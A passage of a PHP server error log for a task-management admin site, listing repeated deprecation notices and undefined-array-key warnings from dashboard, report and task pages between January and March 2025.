/home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:43:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 00:51:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 00:51:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 00:51:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:53:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 00:53:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:55:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:55:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 00:55:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:55:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 00:55:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:55:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 00:57:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:57:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 10:59:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 10:59:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 10:59:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 12:01:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 12:01:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 12:01:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 14:31:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 14:31:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 14:31:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 14:59:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 14:59:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 14:59:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 15:01:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 15:46:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 15:46:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 15:46:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 15:47:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 16:30:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 17:55:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 17:55:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 17:55:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 11:35:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Jan-2025 11:35:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 11:35:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 12:09:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Jan-2025 12:09:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 12:09:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 12:48:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 12:48:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 14:58:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Jan-2025 14:58:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 14:58:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [31-Jan-2025 12:03:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [31-Jan-2025 12:03:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [31-Jan-2025 12:03:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [31-Jan-2025 12:06:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [31-Jan-2025 12:06:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [31-Jan-2025 12:06:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [31-Jan-2025 13:15:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [31-Jan-2025 13:17:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [31-Jan-2025 13:17:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [03-Feb-2025 00:52:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Feb-2025 00:55:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [03-Feb-2025 00:55:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [03-Feb-2025 11:40:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Feb-2025 11:40:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [03-Feb-2025 11:40:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [03-Feb-2025 12:33:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Feb-2025 12:18:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Feb-2025 12:18:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Feb-2025 12:18:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [05-Feb-2025 15:31:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Feb-2025 15:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [05-Feb-2025 15:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Feb-2025 16:22:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Feb-2025 16:22:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Feb-2025 16:22:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 15:26:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 15:26:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 15:26:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 17:42:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 17:42:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 17:42:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 17:44:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 17:44:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 18:12:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 23:10:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 23:10:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 23:10:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Feb-2025 14:36:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Feb-2025 14:37:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Feb-2025 14:37:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Feb-2025 19:02:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Feb-2025 19:02:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Feb-2025 19:02:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [25-Feb-2025 17:48:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Feb-2025 17:48:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [25-Feb-2025 17:48:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Feb-2025 17:02:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Feb-2025 17:02:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Feb-2025 17:02:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Mar-2025 09:01:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Mar-2025 09:01:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Mar-2025 09:01:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Mar-2025 09:08:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Mar-2025 09:08:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Mar-2025 11:52:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Mar-2025 11:54:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Mar-2025 11:54:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Mar-2025 04:19:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Mar-2025 04:20:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Mar-2025 04:20:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [21-Mar-2025 16:27:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 16:28:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 17:11:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:11:46 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:12:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:12:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 